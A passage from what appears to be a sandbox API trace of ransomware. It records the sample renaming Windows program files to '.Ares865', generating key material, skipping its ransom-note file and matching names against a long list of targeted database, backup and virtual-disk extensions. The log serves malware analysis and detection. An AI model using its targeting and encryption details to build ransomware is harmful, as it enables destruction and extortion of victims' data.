(hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.117] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows NT\\Accessories", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows NT\\Accessories") returned="C:\\Program Files (x86)\\Windows NT\\Accessories" [0121.117] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe.Ares865") returned 65 [0121.117] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\wordpad.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\wordpad.exe.ares865"), dwFlags=0x1) returned 1 [0121.122] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\wordpad.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0121.122] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4247040) returned 1 [0121.122] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0121.123] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0121.123] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.375] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0121.376] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0121.376] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.386] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll.Ares865") returned 71 [0121.387] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\wordpadfilter.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\wordpadfilter.dll.ares865"), dwFlags=0x1) returned 1 [0121.390] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\wordpadfilter.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0121.390] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=194560) returned 1 [0121.390] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0121.391] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0121.391] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.412] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0121.413] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0121.413] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.416] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US") returned="C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US" [0121.417] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui.Ares865") returned 75 [0121.417] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\en-us\\wordpad.exe.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\en-us\\wordpad.exe.mui.ares865"), dwFlags=0x1) returned 1 [0121.419] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\wordpad.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\en-us\\wordpad.exe.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0121.419] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=51712) returned 1 [0121.419] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0121.420] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0121.420] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.429] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0121.429] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0121.429] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.431] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Media Player", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Media Player") returned="C:\\Program Files (x86)\\Windows Media Player" [0121.431] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL.Ares865") returned 61 [0121.431] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL" (normalized: "c:\\program files (x86)\\windows media player\\mpvis.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\mpvis.dll.ares865"), dwFlags=0x1) returned 1 [0121.434] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\mpvis.DLL.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\mpvis.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0121.435] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=154112) returned 1 [0121.435] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0121.436] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0121.436] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.450] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0121.451] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0121.451] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.454] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe.Ares865") returned 64 [0121.454] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe" (normalized: "c:\\program files (x86)\\windows media player\\setup_wm.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\setup_wm.exe.ares865"), dwFlags=0x1) returned 1 [0121.458] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\setup_wm.exe.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\setup_wm.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0121.459] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2012672) returned 1 [0121.459] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0121.460] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0121.460] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.671] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0121.673] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0121.673] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0121.701] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521da960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521da960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Skins", cAlternateFileName="")) returned 1 [0121.702] lstrcmpiW (lpString1="Skins", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0121.702] lstrcmpiW (lpString1="Skins", lpString2="aoldtz.exe") returned 1 [0121.702] lstrcpyW (in: lpString1=0x2cce458, lpString2="Skins" | out: lpString1="Skins") returned="Skins" [0121.702] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0121.702] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x64) returned 0x2d3120 [0121.702] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0121.702] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521da960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521da960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Visualizations", cAlternateFileName="VISUAL~1")) returned 1 [0121.702] lstrcmpiW (lpString1="Visualizations", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0121.702] lstrcmpiW (lpString1="Visualizations", lpString2="aoldtz.exe") returned 1 [0121.702] lstrcpyW (in: lpString1=0x2cce458, lpString2="Visualizations" | out: lpString1="Visualizations") returned="Visualizations" [0121.702] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7808 [0121.702] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1808 [0121.702] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7810 | out: ListHead=0x2e7710, ListEntry=0x2e7810) returned 0x2e7c30 [0121.702] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3ee51dd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3ee51dd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3f0b33d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x37c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmlaunch.exe", cAlternateFileName="")) returned 1 [0121.703] lstrcmpiW (lpString1="wmlaunch.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0121.703] lstrcmpiW (lpString1="wmlaunch.exe", lpString2="aoldtz.exe") returned 1 [0121.703] lstrcpyW (in: lpString1=0x2cce458, lpString2="wmlaunch.exe" | out: lpString1="wmlaunch.exe") returned="wmlaunch.exe" [0121.703] lstrlenW (lpString="wmlaunch.exe") returned 12 [0121.703] lstrlenW (lpString="Ares865") returned 7 [0121.703] lstrcmpiW (lpString1="nch.exe", lpString2="Ares865") returned 1 [0121.703] lstrlenW (lpString=".dll") returned 4 [0121.703] lstrcmpiW (lpString1="wmlaunch.exe", lpString2=".dll") returned 1 [0121.703] lstrlenW (lpString=".lnk") returned 4 [0121.703] lstrcmpiW (lpString1="wmlaunch.exe", lpString2=".lnk") returned 1 [0121.703] lstrlenW (lpString=".ini") returned 4 [0121.703] lstrcmpiW (lpString1="wmlaunch.exe", lpString2=".ini") returned 1 [0121.703] lstrlenW (lpString=".sys") returned 4 [0121.703] lstrcmpiW (lpString1="wmlaunch.exe", lpString2=".sys") returned 1 [0121.703] lstrlenW (lpString="wmlaunch.exe") returned 12 [0121.703] lstrlenW (lpString="bak") returned 3 [0121.703] lstrcmpiW (lpString1="exe", lpString2="bak") returned 1 [0121.703] lstrlenW (lpString="ba_") returned 3 [0121.703] lstrcmpiW (lpString1="exe", lpString2="ba_") returned 1 [0121.703] lstrlenW (lpString="dbb") returned 3 [0121.703] lstrcmpiW (lpString1="exe", lpString2="dbb") returned 1 [0121.703] lstrlenW (lpString="vmdk") returned 4 [0121.703] lstrcmpiW (lpString1=".exe", lpString2="vmdk") returned -1 [0121.703] lstrlenW (lpString="rar") returned 3 [0121.703] lstrcmpiW (lpString1="exe", lpString2="rar") returned -1 [0121.703] lstrlenW (lpString="zip") returned 3 [0121.703] lstrcmpiW (lpString1="exe", lpString2="zip") returned -1 [0121.703] lstrlenW (lpString="tgz") returned 3 [0121.703] lstrcmpiW (lpString1="exe", lpString2="tgz") returned -1 [0121.704] lstrlenW (lpString="vbox") returned 4 [0121.704] lstrcmpiW (lpString1=".exe", lpString2="vbox") returned -1 [0121.704] lstrlenW (lpString="vdi") returned 3 [0121.704] lstrcmpiW (lpString1="exe", lpString2="vdi") returned -1 [0121.704] lstrlenW (lpString="vhd") returned 3 [0121.704] lstrcmpiW (lpString1="exe", lpString2="vhd") returned -1 [0121.704] lstrlenW (lpString="vhdx") returned 4 [0121.704] lstrcmpiW (lpString1=".exe", lpString2="vhdx") returned -1 [0121.704] lstrlenW (lpString="avhd") returned 4 [0121.704] lstrcmpiW (lpString1=".exe", lpString2="avhd") returned -1 [0121.704] lstrlenW (lpString="db") returned 2 [0121.704] lstrcmpiW (lpString1="xe", lpString2="db") returned 1 [0121.704] lstrlenW (lpString="db2") returned 3 [0121.704] lstrcmpiW (lpString1="exe", lpString2="db2") returned 1 [0121.704] lstrlenW (lpString="db3") returned 3 [0121.704] lstrcmpiW (lpString1="exe", lpString2="db3") returned 1 [0121.704] lstrlenW (lpString="dbf") returned 3 [0121.704] lstrcmpiW (lpString1="exe", lpString2="dbf") returned 1 [0121.704] lstrlenW (lpString="mdf") returned 3 [0121.704] lstrcmpiW (lpString1="exe", lpString2="mdf") returned -1 [0121.704] lstrlenW (lpString="mdb") returned 3 [0121.704] lstrcmpiW (lpString1="exe", lpString2="mdb") returned -1 [0121.704] lstrlenW (lpString="sql") returned 3 [0121.704] lstrcmpiW (lpString1="exe", lpString2="sql") returned -1 [0121.704] lstrlenW (lpString="sqlite") returned 6 [0121.704] lstrcmpiW (lpString1="ch.exe", lpString2="sqlite") returned -1 [0121.704] lstrlenW (lpString="sqlite3") returned 7 [0121.704] lstrcmpiW (lpString1="nch.exe", lpString2="sqlite3") returned -1 [0121.704] lstrlenW (lpString="sqlitedb") returned 8 [0121.704] lstrcmpiW (lpString1="unch.exe", lpString2="sqlitedb") returned 1 [0121.704] lstrlenW (lpString="xml") returned 3 [0121.704] lstrcmpiW (lpString1="exe", lpString2="xml") returned -1 [0121.704] lstrlenW (lpString="$er") returned 3 [0121.704] lstrcmpiW (lpString1="exe", lpString2="$er") returned 1 [0121.705] lstrlenW (lpString="4dd") returned 3 [0121.705] lstrcmpiW (lpString1="exe", lpString2="4dd") returned 1 [0121.705] lstrlenW (lpString="4dl") returned 3 [0121.705] lstrcmpiW (lpString1="exe", lpString2="4dl") returned 1 [0121.705] lstrlenW (lpString="^^^") returned 3 [0121.705] lstrcmpiW (lpString1="exe", lpString2="^^^") returned 1 [0121.705] lstrlenW (lpString="abs") returned 3 [0121.705] lstrcmpiW (lpString1="exe", lpString2="abs") returned 1 [0121.705] lstrlenW (lpString="abx") returned 3 [0121.705] lstrcmpiW (lpString1="exe", lpString2="abx") returned 1 [0121.705] lstrlenW (lpString="accdb") returned 5 [0121.705] lstrcmpiW (lpString1="h.exe", lpString2="accdb") returned 1 [0121.705] lstrlenW (lpString="accdc") returned 5 [0121.705] lstrcmpiW (lpString1="h.exe", lpString2="accdc") returned 1 [0121.705] lstrlenW (lpString="accde") returned 5 [0121.705] lstrcmpiW (lpString1="h.exe", lpString2="accde") returned 1 [0121.705] lstrlenW (lpString="accdr") returned 5 [0121.705] lstrcmpiW (lpString1="h.exe", lpString2="accdr") returned 1 [0121.705] lstrlenW (lpString="accdt") returned 5 [0121.705] lstrcmpiW (lpString1="h.exe", lpString2="accdt") returned 1 [0121.705] lstrlenW (lpString="accdw") returned 5 [0121.705] lstrcmpiW (lpString1="h.exe", lpString2="accdw") returned 1 [0121.705] lstrlenW (lpString="accft") returned 5 [0121.705] lstrcmpiW (lpString1="h.exe", lpString2="accft") returned 1 [0121.705] lstrlenW (lpString="adb") returned 3 [0121.705] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0121.705] lstrlenW (lpString="adb") returned 3 [0121.705] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0121.705] lstrlenW (lpString="ade") returned 3 [0121.705] lstrcmpiW (lpString1="exe", lpString2="ade") returned 1 [0121.705] lstrlenW (lpString="adf") returned 3 [0121.705] lstrcmpiW (lpString1="exe", lpString2="adf") returned 1 [0121.706] lstrlenW (lpString="adn") returned 3 [0121.706] lstrcmpiW (lpString1="exe", lpString2="adn") returned 1 [0121.706] lstrlenW (lpString="adp") returned 3 [0121.706] lstrcmpiW (lpString1="exe", lpString2="adp") returned 1 [0121.706] lstrlenW (lpString="alf") returned 3 [0121.706] lstrcmpiW (lpString1="exe", lpString2="alf") returned 1 [0121.706] lstrlenW (lpString="ask") returned 3 [0121.706] lstrcmpiW (lpString1="exe", lpString2="ask") returned 1 [0121.706] lstrlenW (lpString="btr") returned 3 [0121.706] lstrcmpiW (lpString1="exe", lpString2="btr") returned 1 [0121.706] lstrlenW (lpString="cat") returned 3 [0121.706] lstrcmpiW (lpString1="exe", lpString2="cat") returned 1 [0121.706] lstrlenW (lpString="cdb") returned 3 [0121.706] lstrcmpiW (lpString1="exe", lpString2="cdb") returned 1 [0121.706] lstrlenW (lpString="ckp") returned 3 [0121.706] lstrcmpiW (lpString1="exe", lpString2="ckp") returned 1 [0121.706] lstrlenW (lpString="cma") returned 3 [0121.706] lstrcmpiW (lpString1="exe", lpString2="cma") returned 1 [0121.706] lstrlenW (lpString="cpd") returned 3 [0121.706] lstrcmpiW (lpString1="exe", lpString2="cpd") returned 1 [0121.706] lstrlenW (lpString="dacpac") returned 6 [0121.706] lstrcmpiW (lpString1="ch.exe", lpString2="dacpac") returned -1 [0121.706] lstrlenW (lpString="dad") returned 3 [0121.706] lstrcmpiW (lpString1="exe", lpString2="dad") returned 1 [0121.706] lstrlenW (lpString="dadiagrams") returned 10 [0121.706] lstrcmpiW (lpString1="launch.exe", lpString2="dadiagrams") returned 1 [0121.706] lstrlenW (lpString="daschema") returned 8 [0121.706] lstrcmpiW (lpString1="unch.exe", lpString2="daschema") returned 1 [0121.706] lstrlenW (lpString="db-journal") returned 10 [0121.706] lstrcmpiW (lpString1="launch.exe", lpString2="db-journal") returned 1 [0121.706] lstrlenW (lpString="db-shm") returned 6 [0121.706] lstrcmpiW (lpString1="ch.exe", lpString2="db-shm") returned -1 [0121.706] lstrlenW (lpString="db-wal") returned 6 [0121.706] lstrcmpiW (lpString1="ch.exe", lpString2="db-wal") returned -1 [0121.707] lstrlenW (lpString="dbc") returned 3 [0121.707] lstrcmpiW (lpString1="exe", lpString2="dbc") returned 1 [0121.707] lstrlenW (lpString="dbs") returned 3 [0121.707] lstrcmpiW (lpString1="exe", lpString2="dbs") returned 1 [0121.707] lstrlenW (lpString="dbt") returned 3 [0121.707] lstrcmpiW (lpString1="exe", lpString2="dbt") returned 1 [0121.707] lstrlenW (lpString="dbv") returned 3 [0121.707] lstrcmpiW (lpString1="exe", lpString2="dbv") returned 1 [0121.707] lstrlenW (lpString="dbx") returned 3 [0121.707] lstrcmpiW (lpString1="exe", lpString2="dbx") returned 1 [0121.707] lstrlenW (lpString="dcb") returned 3 [0121.707] lstrcmpiW (lpString1="exe", lpString2="dcb") returned 1 [0121.707] lstrlenW (lpString="dct") returned 3 [0121.707] lstrcmpiW (lpString1="exe", lpString2="dct") returned 1 [0121.707] lstrlenW (lpString="dcx") returned 3 [0121.707] lstrcmpiW (lpString1="exe", lpString2="dcx") returned 1 [0121.707] lstrlenW (lpString="ddl") returned 3 [0121.707] lstrcmpiW (lpString1="exe", lpString2="ddl") returned 1 [0121.707] lstrlenW (lpString="dlis") returned 4 [0121.707] lstrcmpiW (lpString1=".exe", lpString2="dlis") returned -1 [0121.707] lstrlenW (lpString="dp1") returned 3 [0121.707] lstrcmpiW (lpString1="exe", lpString2="dp1") returned 1 [0121.707] lstrlenW (lpString="dqy") returned 3 [0121.707] lstrcmpiW (lpString1="exe", lpString2="dqy") returned 1 [0121.707] lstrlenW (lpString="dsk") returned 3 [0121.707] lstrcmpiW (lpString1="exe", lpString2="dsk") returned 1 [0121.709] lstrlenW (lpString="dsn") returned 3 [0121.710] lstrcmpiW (lpString1="exe", lpString2="dsn") returned 1 [0121.710] lstrlenW (lpString="dtsx") returned 4 [0121.710] lstrcmpiW (lpString1=".exe", lpString2="dtsx") returned -1 [0121.710] lstrlenW (lpString="dxl") returned 3 [0121.710] lstrcmpiW (lpString1="exe", lpString2="dxl") returned 1 [0121.710] lstrlenW (lpString="eco") returned 3 [0121.710] lstrcmpiW (lpString1="exe", lpString2="eco") returned 1 [0121.710] lstrlenW (lpString="ecx") returned 3 [0121.710] lstrcmpiW (lpString1="exe", lpString2="ecx") returned 1 [0121.710] lstrlenW (lpString="edb") returned 3 [0121.710] lstrcmpiW (lpString1="exe", lpString2="edb") returned 1 [0121.710] lstrlenW (lpString="epim") returned 4 [0121.710] lstrcmpiW (lpString1=".exe", lpString2="epim") returned -1 [0121.710] lstrlenW (lpString="fcd") returned 3 [0121.710] lstrcmpiW (lpString1="exe", lpString2="fcd") returned -1 [0121.710] lstrlenW (lpString="fdb") returned 3 [0121.710] lstrcmpiW (lpString1="exe", lpString2="fdb") returned -1 [0121.710] lstrlenW (lpString="fic") returned 3 [0121.710] lstrcmpiW (lpString1="exe", lpString2="fic") returned -1 [0121.710] lstrlenW (lpString="flexolibrary") returned 12 [0121.710] lstrlenW (lpString="fm5") returned 3 [0121.710] lstrcmpiW (lpString1="exe", lpString2="fm5") returned -1 [0121.710] lstrlenW (lpString="fmp") returned 3 [0121.710] lstrcmpiW (lpString1="exe", lpString2="fmp") returned -1 [0121.710] lstrlenW (lpString="fmp12") returned 5 [0121.710] lstrcmpiW (lpString1="h.exe", lpString2="fmp12") returned 1 [0121.710] lstrlenW (lpString="fmpsl") returned 5 [0121.710] lstrcmpiW (lpString1="h.exe", lpString2="fmpsl") returned 1 [0121.710] lstrlenW (lpString="fol") returned 3 [0121.710] lstrcmpiW (lpString1="exe", lpString2="fol") returned -1 [0121.710] lstrlenW (lpString="fp3") returned 3 [0121.710] lstrcmpiW (lpString1="exe", lpString2="fp3") returned -1 [0121.711] lstrlenW (lpString="fp4") returned 3 [0121.711] lstrcmpiW (lpString1="exe", lpString2="fp4") returned -1 [0121.711] lstrlenW (lpString="fp5") returned 3 [0121.711] lstrcmpiW (lpString1="exe", lpString2="fp5") returned -1 [0121.711] lstrlenW (lpString="fp7") returned 3 [0121.711] lstrcmpiW (lpString1="exe", lpString2="fp7") returned -1 [0121.711] lstrlenW (lpString="fpt") returned 3 [0121.711] lstrcmpiW (lpString1="exe", lpString2="fpt") returned -1 [0121.711] lstrlenW (lpString="frm") returned 3 [0121.711] lstrcmpiW (lpString1="exe", lpString2="frm") returned -1 [0121.711] lstrlenW (lpString="gdb") returned 3 [0121.711] lstrcmpiW (lpString1="exe", lpString2="gdb") returned -1 [0121.711] lstrlenW (lpString="gdb") returned 3 [0121.711] lstrcmpiW (lpString1="exe", lpString2="gdb") returned -1 [0121.711] lstrlenW (lpString="grdb") returned 4 [0121.711] lstrcmpiW (lpString1=".exe", lpString2="grdb") returned -1 [0121.711] lstrlenW (lpString="gwi") returned 3 [0121.711] lstrcmpiW (lpString1="exe", lpString2="gwi") returned -1 [0121.711] lstrlenW (lpString="hdb") returned 3 [0121.711] lstrcmpiW (lpString1="exe", lpString2="hdb") returned -1 [0121.711] lstrlenW (lpString="his") returned 3 [0121.711] lstrcmpiW (lpString1="exe", lpString2="his") returned -1 [0121.711] lstrlenW (lpString="ib") returned 2 [0121.711] lstrcmpiW (lpString1="xe", lpString2="ib") returned 1 [0121.711] lstrlenW (lpString="idb") returned 3 [0121.711] lstrcmpiW (lpString1="exe", lpString2="idb") returned -1 [0121.711] lstrlenW (lpString="ihx") returned 3 [0121.711] lstrcmpiW (lpString1="exe", lpString2="ihx") returned -1 [0121.711] lstrlenW (lpString="itdb") returned 4 [0121.711] lstrcmpiW (lpString1=".exe", lpString2="itdb") returned -1 [0121.711] lstrlenW (lpString="itw") returned 3 [0121.711] lstrcmpiW (lpString1="exe", lpString2="itw") returned -1 [0121.711] lstrlenW (lpString="jet") returned 3 [0121.711] lstrcmpiW (lpString1="exe", lpString2="jet") returned -1 [0121.712] lstrlenW (lpString="jtx") returned 3 [0121.712] lstrcmpiW (lpString1="exe", lpString2="jtx") returned -1 [0121.712] lstrlenW (lpString="kdb") returned 3 [0121.712] lstrcmpiW (lpString1="exe", lpString2="kdb") returned -1 [0121.712] lstrlenW (lpString="kexi") returned 4 [0121.712] lstrcmpiW (lpString1=".exe", lpString2="kexi") returned -1 [0121.712] lstrlenW (lpString="kexic") returned 5 [0121.712] lstrcmpiW (lpString1="h.exe", lpString2="kexic") returned -1 [0121.712] lstrlenW (lpString="kexis") returned 5 [0121.712] lstrcmpiW (lpString1="h.exe", lpString2="kexis") returned -1 [0121.712] lstrlenW (lpString="lgc") returned 3 [0121.712] lstrcmpiW (lpString1="exe", lpString2="lgc") returned -1 [0121.712] lstrlenW (lpString="lwx") returned 3 [0121.712] lstrcmpiW (lpString1="exe", lpString2="lwx") returned -1 [0121.712] lstrlenW (lpString="maf") returned 3 [0121.712] lstrcmpiW (lpString1="exe", lpString2="maf") returned -1 [0121.712] lstrlenW (lpString="maq") returned 3 [0121.712] lstrcmpiW (lpString1="exe", lpString2="maq") returned -1 [0121.712] lstrlenW (lpString="mar") returned 3 [0121.712] lstrcmpiW (lpString1="exe", lpString2="mar") returned -1 [0121.712] lstrlenW (lpString="marshal") returned 7 [0121.712] lstrcmpiW (lpString1="nch.exe", lpString2="marshal") returned 1 [0121.712] lstrlenW (lpString="mas") returned 3 [0121.712] lstrcmpiW (lpString1="exe", lpString2="mas") returned -1 [0121.712] lstrlenW (lpString="mav") returned 3 [0121.712] lstrcmpiW 